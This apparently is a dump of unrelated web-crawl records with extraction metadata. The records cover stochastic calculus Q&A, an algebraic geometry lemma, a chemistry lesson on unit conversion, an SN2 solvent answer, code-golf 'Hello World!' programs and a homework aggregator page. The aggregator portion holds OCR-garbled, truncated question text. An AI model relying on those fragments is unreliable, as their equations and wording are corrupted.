# Tag Info 6 Consider $$X_t=a(t-1)+bt+(1-t)Y_t,\qquad Y_t=\int_{0}^{t}\frac{\mathrm dB_s}{1-s},$$ then $$\mathrm dY_t=\frac{dB_t}{1-t},\qquad \mathrm dX_t=a\mathrm dt+b\mathrm dt+(1-t)\mathrm dY_t-Y_t\mathrm dt,$$ hence $$\mathrm dX_t=\mathrm dB_t+\left(a+b-\int_{0}^{t}\frac{\mathrm dB_s}{1-s}\right)\mathrm dt,$$ and $$\mathrm d\langle X\rangle_t=\mathrm dt.$$ Edit: In ... 3 Firstly, by the strong law of large number, the limit should exist. Consider $$\theta_k = \inf\{t\geq 0, W_t = k\pi\}$$ Then the integral can be written as the sum of $\int_{\theta_{k}}^{\theta_{k+1}}\sin^2(W_s)ds$, we have \begin{align} \frac{1}{t}\int_0^t \sin^2(W_s)ds = \dfrac{\sum_{k=1}^{+\infty}1_{\theta_k < t}}{t} ... 2 I just realized I can use the fact that for radon measure $\mu$ on $[0,1]$, $f(t) = \mu([0,t])$ is of finite variation. So in my question, if for $\omega$ in $\Omega_0$ with $P(\Omega_0) = 1$, $h(\cdot)(\omega)$ is a Radon measure on $[0,1]$, then $h([0,t]) = W_t$ is of finite variation. This is contradictory with the fact that Brownian motion has infinite ... 2 Let $X_t=\displaystyle\int_0^ts\mathrm dW_s$ and $Y_t=\displaystyle\int_0^tW_s\mathrm ds$, then $X_t+Y_t=tW_t$ hence $E(X_t\mid W_t)=tW_t-E(Y_t\mid W_t)$. Furthermore, $E(W_s\mid W_t)=sW_t/t$ for every $s$ in $(0,t)$ hence $$E(Y_t\mid W_t)=\displaystyle\int_0^tE(W_s\mid W_t)\mathrm ds=(W_t/t)\displaystyle\int_0^ts\mathrm ds=tW_t/2.$$ Thus, $E(X_t\mid ... 1 This follows from the following theorem: Theorem: Let$(M_t,\mathcal{F}_t)_{t \geq 0}$be a martingale such that the sample paths are (almost surely) continuous and of bounded variation. Then$M_t = M_0$almost surely. (For a proof see e.g. René Schilling/Lothar Partzsch: Brownian motion - An Introduction to Stochastic Processes.) Since $$M_t := ... 1 Hint: use the Ito formula in the form:$$ d\left[\left(\alpha(t) +\int_0^t a_s dB_s\right) \left(\beta(t) + \int_0^t b_s dB_s\right)\right] \\= \left(\alpha(t)+\int_0^t a_s dB_s\right)\left(d\beta(t) + b_t dB_t\right) + \left( d\alpha(t) + a_tdB_t \right)\left(\beta(t) + \int_0^t b_s dB_s\right) + a_sb_s ds $$where \alpha,\beta:\Bbb R^+\to ... 1 Lets assume that we are in the regime in which V_t > 0 for every t>0. Consider the sequence of stopping times$$\tau_n = \inf \left\{ t: V_t > n \right\}, \quad n \in \mathbf{N},$$then, as you mentioned before, if we can show that \tau_n \to \infty as n \to \infty in probability the result follows by standard localization: the expectation ... 1 It simply depends whether one wants to consider integrals with infinite time-horizon or not. Usually, stochastic integrals of the form$$\int_0^T K_s \, dW_s \tag{1}$$are considered where T<\infty. In this case,$$\mathbb{E} \left[ \left( \int_0^T K_s \, dW_s \right)^2 \right] = \mathbb{E}\left( \int_0^T K_s^2 \, ds \right) \tag{2}$$is called Itô's ... 1 Hi as mentioned in my comment the proof given does not allows us to conclude by localization. I have finally found a rigorous and elementary proof of the fact that a CIR process possesses moments of all orders which is necessary to get the result (order 1 is enough for our need) . First two obersvations : by Yamada-Watanabe's theorem that the CIR's SDE ... 1 First of all, the statement$$dH_{n+1}(t,B_t) = H_n(t,B_t)$$doesn't make sense. Or can you explain what you mean by it? I guess, it should read$$dH_{n+1}(t,B_t) = H_n(t,B_t) \, dB_t;$$at least that's what I going to prove in this answer. Lemma 1$$H_{n+1}(t,x) = \frac{x}{n+1} H_n(t,x) - \frac{t}{n+1} H_{n-1}(t,x). \tag{0}$$Proof: Denote by ... 1 Hints Recall that the independence of two stochastic processes (M_t)_{t \geq 0} and (N_t)_{t \geq 0} is equivalent to the independence of the corresponding canonical \sigma-algebras \mathcal{F}_{\infty}^M and \mathcal{F}_{\infty}^N,$$\mathcal{F}_{\infty}^M := \sigma(M_s; s \geq 0).$$Let f be an \mathcal{F}_t^M-adapted process such that ... 1 Via Ito integral and using Ito Lemma (third and penultimate steps):$$ \int_0^t \sin(B_u)\circ dB_u = \int_0^t \sin(B_u) dB_u +\frac{1}{2}\int_0^t d(\sin(B_u))dB_u = \int_0^t \sin(B_u) dB_u + \frac{1}{2}\int_0^t\left(\sin'(B_u) dB_u +\frac{1}{2}\sin''(B_u) du\right)dB_u = \int_0^t \sin(B_u) dB_u + \frac{1}{2}\int_0^t\sin'(B_u) du = ... 1 Hints: First, solve the homogeneous SDE $$dX_t = \delta \mu X_t \, dt + \delta X_t \, dB_t. \tag{1}$$ To this end, apply Itô's formula to$f(x) := \log x$and$(X_t)_{t \geq 0}$. In order to solve the SDE $$dX_t = (1+\delta \mu X_t) \, dt + \delta X_t \, dB_t,$$ we use a variation of constants, i.e. we make the Ansatz $$X_t = Z_t X_t^0$$ where$X_t^0\$ is a ... Only top voted, non community-wiki answers of a minimum length are eligible
2014-10-21 07:53:25
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9946925044059753, "perplexity": 458.23309203540845}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2014-42/segments/1413507444209.14/warc/CC-MAIN-20141017005724-00138-ip-10-16-133-185.ec2.internal.warc.gz"}
https://stacks.math.columbia.edu/tag/0B72
Lemma 42.29.4. Let $(S, \delta )$ be as in Situation 42.7.1. Let $X$ be locally of finite type over $S$. Let $(\mathcal{L}, s, i : D \to X)$ be a triple as in Definition 42.28.1. Let $\mathcal{N}$ be an invertible $\mathcal{O}_ X$-module. Then $i^*(c_1(\mathcal{N}) \cap \alpha ) = c_1(i^*\mathcal{N}) \cap i^*\alpha$ in $\mathop{\mathrm{CH}}\nolimits _{k - 2}(D)$ for all $\alpha \in \mathop{\mathrm{CH}}\nolimits _ k(X)$. There are also: • 2 comment(s) on Section 42.29: Gysin homomorphisms and rational equivalence In your comment you can use Markdown and LaTeX style mathematics (enclose it like $\pi$). A preview option is available if you wish to see how it works out (just click on the eye in the toolbar).
2021-10-25 01:08:51
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 2, "x-ck12": 0, "texerror": 0, "math_score": 0.9738450050354004, "perplexity": 460.26881515960724}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-43/segments/1634323587608.86/warc/CC-MAIN-20211024235512-20211025025512-00404.warc.gz"}
https://chem.libretexts.org/Courses/UWMilwaukee/CHE_125%3A_GOB_Introductory_Chemistry/02%3A_Measurements_and_Density/2.07%3A_Solving_Multistep_Conversion_Problems
# 2.7: Solving Multistep Conversion Problems ## Multiple Conversions Sometimes you will have to perform more than one conversion to obtain the desired unit. For example, suppose you want to convert 54.7 km into millimeters. We will set up a series of conversion factors so that each conversion factor produces the next unit in the sequence. We first convert the given amount in km to the base unit which is meters. We know that 1,000 m =1 km. Then we convert meters to mm, remembering that $$1\; \rm{mm}$$ = $$10^{-3}\; \rm{m}$$. Concept Map Calculation \begin{align} 54.7 \; \cancel{\rm{km}} \times \dfrac{1,000 \; \cancel{\rm{m}}}{1\; \cancel{\rm{km}}} \times \dfrac{1\; \cancel{\rm{mm}}}{\cancel{10^{-3} \rm{m}}} & = 54,700,000 \; \rm{mm} \\ &= 5.47 \times 10^7\; \rm{mm} \end{align} In each step, the previous unit is canceled and the next unit in the sequence is produced, each successive unit canceling out until only the unit needed in the answer is left. Example $$\PageIndex{1}$$: Unit Conversion Convert 58.2 ms to megaseconds in one multistep calculation. SOLUTION Steps for Problem Solving Unit Conversion Identify the "given"information and what the problem is asking you to "find." Given: 58.2 ms Find: Ms List other known quantities $$1 ms = 10^{-3} s$$ $$1 Ms = 10^6s$$ Prepare a concept map Calculate \begin{align} 58.2 \; \cancel{\rm{ms}} \times \dfrac{10^{-3} \cancel{\rm{s}}}{1\; \cancel{\rm{ms}}} \times \dfrac{1\; \rm{Ms}}{1,000,000\; \cancel{ \rm{s}}} & =0.0000000582\; \rm{Ms} \nonumber\\ &= 5.82 \times 10^{-8}\; \rm{Ms}\nonumber \end{align}\nonumber Neither conversion factor affects the number of significant figures in the final answer. Example $$\PageIndex{2}$$: Unit Conversion How many seconds are in a day? Solution Steps for Problem Solving Unit Conversion Identify the "given"information and what the problem is asking you to "find." Given: 1 day Find: s List other known quantities 1 day = 24 hours 1 hour = 60 minutes 1 minute = 60 seconds Prepare a concept map Calculate $1 \: \text{d} \times \frac{24 \: \text{hr}}{1 \: \text{d}}\times \frac{60 \: \text{min}}{1 \: \text{hr}} \times \frac{60 \: \text{s}}{1 \: \text{min}} = 86,400 \: \text{s} \nonumber$ Exercise $$\PageIndex{1}$$ Perform each conversion in one multistep calculation. 1. 43.007 ng to kg 2. 1005 in to ft 3. 12 mi to km $$4.3007 x 10^{-11} kg$$ 83.75 ft 19 km Career Focus: Pharmacist A pharmacist dispenses drugs that have been prescribed by a doctor. Although that may sound straightforward, pharmacists in the United States must hold a doctorate in pharmacy and be licensed by the state in which they work. Most pharmacy programs require four years of education in a specialty pharmacy school. Pharmacists must know a lot of chemistry and biology so they can understand the effects that drugs (which are chemicals, after all) have on the body. Pharmacists can advise physicians on the selection, dosage, interactions, and side effects of drugs. They can also advise patients on the proper use of their medications, including when and how to take specific drugs properly. Pharmacists can be found in drugstores, hospitals, and other medical facilities. Curiously, an outdated name for pharmacist is chemist, which was used when pharmacists formerly did a lot of drug preparation, or compounding. In modern times, pharmacists rarely compound their own drugs, but their knowledge of the sciences, including chemistry, helps them provide valuable services in support of everyone’s health. A woman consulting with a pharmacist. This image was released by the National Cancer Institute, an agency part of the National Institutes of Health. (Public Domain; Rhoda Baer (Photographer) via NIH). ## Summary In multistep conversion problems, the previous unit is canceled for each step and the next unit in the sequence is produced, each successive unit canceling out until only the unit needed in the answer is left. ## Contributuors • Henry Agnew (UC Davis) 2.7: Solving Multistep Conversion Problems is shared under a CC BY license and was authored, remixed, and/or curated by LibreTexts.
2022-10-02 03:02:32
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 2, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9841662049293518, "perplexity": 4930.438049995145}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337244.17/warc/CC-MAIN-20221002021540-20221002051540-00214.warc.gz"}
http://coderethinked.com/tags/row-number/
# Generating Sequence Numbers In LINQ Query In this post, we’ll see how to generate sequence numbers along with the data that we need in LINQ C#.
2019-04-23 22:27:15
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8171141743659973, "perplexity": 2603.051384047875}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-18/segments/1555578613888.70/warc/CC-MAIN-20190423214818-20190424000818-00105.warc.gz"}
https://socratic.org/questions/why-does-sn2-favor-aprotic
# Why does SN2 favor aprotic? Mar 26, 2016 It should be the other way round: aprotic solvent favors ${\text{S}}_{N} 2$. #### Explanation: For ${\text{S}}_{N} 1$, the rate determining step depends on the leaving group. The nucleophile does not play an important role. For ${\text{S}}_{N} 2$, that is not the case. The more nucleophilic the nucleophile, the faster the reaction. In protic solvents, the nucleophile is "trapped" in a cage of solvent molecules, and becomes less nucleophilic. Consequently, the ${\text{S}}_{N} 2$ reaction occurs as a slower rate. Hence, ${\text{S}}_{N} 2$ is favored in an aprotic environment, where there is less hindrance to the nucleophiles.
2023-01-31 11:12:09
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 5, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6833646893501282, "perplexity": 4169.583167039172}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-06/segments/1674764499857.57/warc/CC-MAIN-20230131091122-20230131121122-00449.warc.gz"}
https://codegolf.stackexchange.com/questions/1536/hello-world-0-0?page=4&tab=votes
Hello World 0.0! source: Dilbert, September 8, 1992 I'm hoping to add a new twist on the classic "Hello World!" program. Code a program that outputs Hello World! without: • String/Character literals • Numbers (any base) • Pre-built functions that return "Hello World!" • RegEx literals With the exceptions of "O" and 0. †"O" is capitalized, "o" is not acceptable. • One of [code-golf] and [code-challenge] please, not both. The point of these tags to to help people find questions with the rules they want to use. Essentially every question on this site should be a game of some kind or another. – dmckee Mar 11 '11 at 22:29 • -1 We've already had Obfuscated Hello World, and I think this challenge is too similar. I'd have cast a "close as duplicate" vote, if I weren't a mod. – Chris Jester-Young Mar 11 '11 at 22:35 • @zzzzBov: I don't think it's different enough to warrant another question in the "hello world" theme; a different theme would have been better. But, that's just my opinion. – Chris Jester-Young Mar 11 '11 at 23:39 • I think this is a fine code golf - and better than the prior one. – MtnViewMark Mar 12 '11 at 6:58 • Some people seem to assume that "O"* means they can have a string literal with any number of O’s, including zero. I don’t think that was the intention. Please clarify. – Timwi Mar 12 '11 at 21:12 PHP, 160 157 bytes no literals at all. Still wonder if it has golfing potential left: for(;$c=[$h=($f=($t=++$n+$n)+$t)+$f+$s=$f*$f*$f,$e=$s+$s/$t+$v=$f+$n--,$l=$e+$f+--$f,$l,$o=$l+$f,$s/=$t,$h+$v*$f,$o,$o+$f,$l,--$e,++$s][+$i++];)echo chr($c); creates an array with the ascii codes and loops through it to print the characters. Run with -nr or try it online. breakdown for(;$c=[$h= ($f=($t=++$n+$n)+$t) #$n=1,$t=2,$f=4 +$f+$s=$f*$f*$f, # H$s=64,$h=72$e=$s+$s/$t+$v=$f+$n--, # e $n=0,$v=5,$e=101$l=$e+$f+--$f,$l, # ll $f=3,$l=108 $o=$l+$f, # o$o=111 $s/=$t, # space $s=32$h+$v*$f,$o, # Wo$o+$f,$l, # rl --$e, # d$e=100 ++$s # !$s=33 ][+$i++];) # loop through array echo chr($c); # print character F#, 103 bytes let[<EntryPoint>]Hello world!a=System.Reflection.MethodBase.GetCurrentMethod().Name|>stdout.Write;0 Similar to some of the other answers here. The characters around the method name are not literals, rather they "delimit an identifier that would otherwise not be a legal identifier, such as a language keyword." (Source) They do make F# nice for writing tests, since you can give a long human-language name for the tests instead of a programming-language name. Forth (gforth), 38 bytes : f name type ; f Hello space f World! Try it online! OR name World! name Hello type space type Try it online! Explanation Uses the Forth built-in for processing code to convert the next character entered to a string, and then prints it Code Explanation : f \ start a new word definition name \ grabs the next word (space-delimited) from the input/code type \ output the string on top of the stack ; \ end word definition f Hello \ converts and outputs Hello, as name will grab Hello from the input before continuing space \ outputs a single space f World! \ converts World! to a string and outputs it C# (357) class H { static void main() { Func<ConsoleKey, char> f = (k) => (char) k; Func<char, char> l = (c) => char.ToLower(c); Console.WriteLine(new[] { f(ConsoleKey.H), l(f(ConsoleKey.E)), l(f(ConsoleKey.L)), l(f(ConsoleKey.L)), l(f(ConsoleKey.O)), f(ConsoleKey.Spacebar), f(ConsoleKey.W), l(f(ConsoleKey.O)), l(f(ConsoleKey.R)), l(f(ConsoleKey.L)), l(f(ConsoleKey.D)), f(ConsoleKey.PageUp) }); } } Golfed: class H{static void main(){Func<ConsoleKey,char>f=(k)=>(char)k;Func<char,char>l=(c)=>char.ToLower(c);Console.WriteLine(new[]{f(ConsoleKey.H),l(f(ConsoleKey.E)),l(f(ConsoleKey.L)),l(f(ConsoleKey.L)),l(f(ConsoleKey.O)),f(ConsoleKey.Spacebar),f(ConsoleKey.W),l(f(ConsoleKey.O)),l(f(ConsoleKey.R)),l(f(ConsoleKey.L)),l(f(ConsoleKey.D)),f(ConsoleKey.PageUp)});}} • using C = System.ConsoleKey; would save a number of chars. – zzzzBov Jan 28 '14 at 22:55 • I don't think it will. Enum constants can only be referred through Enum. – microbian Jan 28 '14 at 23:02 • Next time, please compile your programs before posting them. This needs a using System and Main needs to be capitalized. However, the suggestion made by @zzzzBov is correct; you can use using C=System.ConsoleKey; to abbreviate the code massively. Furthermore, you can remove the parentheses around the lambda parameters. That takes it down to 275. – Timwi Feb 5 '14 at 0:48 Ruby 49 chars def Hello World!;puts __method__;end Hello World! The whitespace in the method name is a UTF8 Emsp, a little wider then a normal space which would be a syntax error. Stuck, 0 bytes Yup, an empty program in stuck prints Hello, World! I don't see any string literals or Regex here • standard loophole – zzzzBov Jan 22 '17 at 7:01 • Ok, let me start by explaining that I am the original poster of this challenge, so whatever I tell you can be considered "word of god" for this challenge. I'll follow that with the fact that I posted this challenge almost six years ago, and I was much less experienced. Finally, per the FAQ "The purpose of this question is to provide a repository of standard loopholes which may be assumed to be closed without the question-setter having to explicitly close them." -- with all of that said, they are absolutely forbidden for this challenge. – zzzzBov Jan 28 '17 at 16:58 Windows Batch (17) echo Hello World! • Does Hello World! not qualify as a string literal here? Curious. – shadowtalker Jul 7 '14 at 22:11
2019-08-18 12:55:04
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.33568307757377625, "perplexity": 3826.2083987311253}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-35/segments/1566027313889.29/warc/CC-MAIN-20190818124516-20190818150516-00329.warc.gz"}
https://solvedlib.com/n/4-4-21find-particular-solution-to-the-differential-equation,15463008
# 4.4.21Find particular solution to the differential equation using the Method of Undetermined Coefficients.x" (t) - 16x'(t) + 64x(t) = Zt ###### Question: 4.4.21 Find particular solution to the differential equation using the Method of Undetermined Coefficients. x" (t) - 16x'(t) + 64x(t) = Zt e Asolution is Xp(t) = #### Similar Solved Questions ##### Three point charges are placed on the x-axis as follows: 22 μC at x=0 ; 30... Three point charges are placed on the x-axis as follows: 22 μC at x=0 ; 30 μC at x=0.60m ; and -10 μC at x=1.1m Part A : Find the net force on the 22 μC point charge. Assume the direction of the x-axis as positive.Express your answer to two significant figures and include the appropriate... ##### Question 2The following results were obtuined from standard compaction test If the mini nllowed degree of compaction is 97,0%: Plot the compaction curve Find the rurge of" water content which can be applied Find Ile maximum dry density and corresponding optimum moisture conienL Plot also zero and 3%/ Hir voids curves. Take Gs 2.80Watet conannt densky tmg Vo tm' (na-0c1 Yd, Im' (na45%1Jo.QX10 90r13,202116.60k17,901117.019,0I0,0 L.O 120140 150 Watcr conicut:5 M Question 2 The following results were obtuined from standard compaction test If the mini nllowed degree of compaction is 97,0%: Plot the compaction curve Find the rurge of" water content which can be applied Find Ile maximum dry density and corresponding optimum moisture conienL Plot also zero ... ##### 3) If sulfuric acid was added to sodium carbonate which type of reaction would take place? Write a balanced reaction and balanced net ionic equation for this reaction. 3) If sulfuric acid was added to sodium carbonate which type of reaction would take place? Write a balanced reaction and balanced net ionic equation for this reaction.... ##### Hw12 July13: Problem 14 Previous Problem Problem List Next Problem (1 point) Let 9 1 7... hw12 July13: Problem 14 Previous Problem Problem List Next Problem (1 point) Let 9 1 7 Find an orthonormal basis of the image of A.... ##### WW exponential" graph Below 'hae E line displaying ] assuming the data Ji a prediction what the revenue would be for 2002if iriere Cieco Annud K 1 'and another assuming the 1990-1999 for the years M One WW exponential" graph Below 'hae E line displaying ] assuming the data Ji a prediction what the revenue would be for 2002if iriere Cieco Annud K 1 'and another assuming the 1990-1999 for the years M One... ##### QUESTION ONE Conflict is sometimes misunderstood and interpreted wrongly by conflict managers and leaders of organizations.... QUESTION ONE Conflict is sometimes misunderstood and interpreted wrongly by conflict managers and leaders of organizations. With appropriate examples, critically examine the misconceptions about conflict in organizations (40 marks) QUESTION TWO Using your place of work or any organization you are fa... ##### Find the critical points of the function f (=) 261Enter your answers in increasing order If the number of critical points less than the number response areas, enter NA in the remaining response areas: Find the critical points of the function f (=) 261 Enter your answers in increasing order If the number of critical points less than the number response areas, enter NA in the remaining response areas:... ##### In this lab, we will implement the Linked Bag. The bag will contain a sequence of... In this lab, we will implement the Linked Bag. The bag will contain a sequence of strings. First, you need to design the Node class (Node.java). It will contain an integer data and a reference to thenext Node. The constructor of Node class receives an integer and assigns it to the data field. It als... ##### Point) A spring with spring constant k of 100 pounds per foot is loaded with 1-pound weight and brought to equilibrium: It is then stretched an additional inch and released Find the equation of motion; the amplitude, and the period. Neglect friction. Theny(t) where is time in (seconds) and y(t) is displacement (in feet)Amplitude:inch(es)Period:second(s): point) A spring with spring constant k of 100 pounds per foot is loaded with 1-pound weight and brought to equilibrium: It is then stretched an additional inch and released Find the equation of motion; the amplitude, and the period. Neglect friction. Then y(t) where is time in (seconds) and y(t) is ... ##### A physical education department wanted a single test of upper body strength that was easy to... A physical education department wanted a single test of upper body strength that was easy to administer. Dips on the parallel bars and pull-ups on the horizontal bar were considered good tests. One faculty member thought that both tests were not needed because the correlation between the two was pro... ##### Consider the region bounded by the parabola and the line 2* (see figure)Find the area of this region by integrating points) with respect [0 x.points) Find the area of this region by integrating with respect to y. Consider the region bounded by the parabola and the line 2* (see figure) Find the area of this region by integrating points) with respect [0 x. points) Find the area of this region by integrating with respect to y.... ##### Question 2:A traffic study of an urban freeway corridor identified the locations with the highest incidence of crashes. The corridor includes threc freewav segments and three interchanges: Using the crash data and traffic volumes tabulated below. rank the interchanges by number of crashes per year per million vehicles for each interchange from highest to lowest:INTERCHANCE EXitCRASHES PER YEARHichway SECMINTCRASHES PER YCARSECMENT LENGTH28500 11250 2315048 to 55 55 to 58 58 to 6168000 72000 6300 Question 2: A traffic study of an urban freeway corridor identified the locations with the highest incidence of crashes. The corridor includes threc freewav segments and three interchanges: Using the crash data and traffic volumes tabulated below. rank the interchanges by number of crashes per year ... ##### Imagine you are a Kindergarten teacher explaining the Common Core Standards to a group of families... Imagine you are a Kindergarten teacher explaining the Common Core Standards to a group of families by responding to the following three questions. Reference course/unit material in your post. Please make sure to use APA format when you reference materials. Why is it called the “Common Core&rd... ##### Sonboard/do/conference?toggle modereada ρ . ฮ Dscussion Board-2018 Fall .. x your finger tip. After reading this... sonboard/do/conference?toggle modereada ρ . ฮ Dscussion Board-2018 Fall .. x your finger tip. After reading this chapter think of how you will proceed next time you read an allegation of a cure or improve a condition and how likely you are to believe it. What would you require to give it v... ##### The human body acts as a nearly perfect blackbody withemissivity ε = 0.97. The energy given off as thermal radiation isproduced by metabolizing the food we eat.a.) Assuming the temperature is 310 K and the surfacearea given by a cylinder of 175 cm height and 13 cm radius,calculate the total energy in kilocalories given off by a typicalhuman body in a single 24-hour period. How does this compare to thetypical dietary requirements for a human being?b.) Assuming that the environment around us is a The human body acts as a nearly perfect blackbody with emissivity ε = 0.97. The energy given off as thermal radiation is produced by metabolizing the food we eat. a.) Assuming the temperature is 310 K and the surface area given by a cylinder of 175 cm height and 13 cm radius, calculate the total ... ##### What body systems are associated with NMS? What body systems are associated with NMS?... ##### Solve and graph each solution set. $-7 \leq 4 x+5 \leq 13$ Solve and graph each solution set. $-7 \leq 4 x+5 \leq 13$... ##### QUESTION 9 Consider the following beam pinned at its left end with a roller support at... QUESTION 9 Consider the following beam pinned at its left end with a roller support at its right end. The beam is loaded with P1-22 N and P2-44 N B A 440 400. 240 (mm) The absolute maximum value of the internal shear force (N) in the beam is nearest to O 60 O40 O45 O55 50 QUESTION 9 Consider the fo... ##### Relative Velocity A science student is riding on a flatcar of a train traveling along a straight horizontal track at a constant speed of 10 m/s. The student throws a ball into theair along a path that he judges to make an initial angle of 60.0 degrees with the horizontal and to be in line with the track. The student&... ##### Apply Green' s Theorem to evaluate the integral (y+xJdx+ (y+xJdy C: The circle (x ~ 5}? + (y - 3)2 = 48 (y txidx + (y +xJdy [Type an exact answer using T as needed ) Apply Green' s Theorem to evaluate the integral (y+xJdx+ (y+xJdy C: The circle (x ~ 5}? + (y - 3)2 = 4 8 (y txidx + (y +xJdy [Type an exact answer using T as needed )... ##### Check each proposed solution by direct substitution or with a graphing utility. $\ln (\ln x)=0$ Check each proposed solution by direct substitution or with a graphing utility. $\ln (\ln x)=0$... ##### [20 points] Consider the function f(2) 22 4r + 5 over the interval [3. 7]. Let S be the region! under the graph of f (x) over the interval [3. 7]. Right endpoint approximation using k=4 many rectangles. Use the right endpoint method to approximate the area of the region S using four equally wide rectangles. That is: Sketch the function and shade in the desired area. In second sketch; sketch the four rectangles approximating the desired area Compute the total area of the four rectangles. b) Righ [20 points] Consider the function f(2) 22 4r + 5 over the interval [3. 7]. Let S be the region! under the graph of f (x) over the interval [3. 7]. Right endpoint approximation using k=4 many rectangles. Use the right endpoint method to approximate the area of the region S using four equally wide re... ##### Examine how the PEST can be used by a marketer to understand changes in the external... Examine how the PEST can be used by a marketer to understand changes in the external environmental forces affecting a company.... ##### Simplify each complex rational expression by the method of your choice.$rac{ rac{12}{x^{2}}- rac{3}{x}}{ rac{15}{x}- rac{9}{x^{2}}}$ Simplify each complex rational expression by the method of your choice. $\frac{\frac{12}{x^{2}}-\frac{3}{x}}{\frac{15}{x}-\frac{9}{x^{2}}}$... ##### Need help with B, C, D Question 1 (20 points) a) Calculate the future value of... need help with B, C, D Question 1 (20 points) a) Calculate the future value of $20,000 invested now (time zero) for 5 years. It grows at a rate of 3% per year compounded annually. b) How much money will you have 25 years from now, if you deposit$1,000 into a bank account at the end of each year.... ##### Use linear approximations to estimate the following quantities. Choose a value of a to produce a small error.$e^{0.06}$ Use linear approximations to estimate the following quantities. Choose a value of a to produce a small error. $e^{0.06}$... ##### How do you find the slope for (2, -7) (0, -10)? How do you find the slope for (2, -7) (0, -10)?... ##### Question 10 2 pts In the 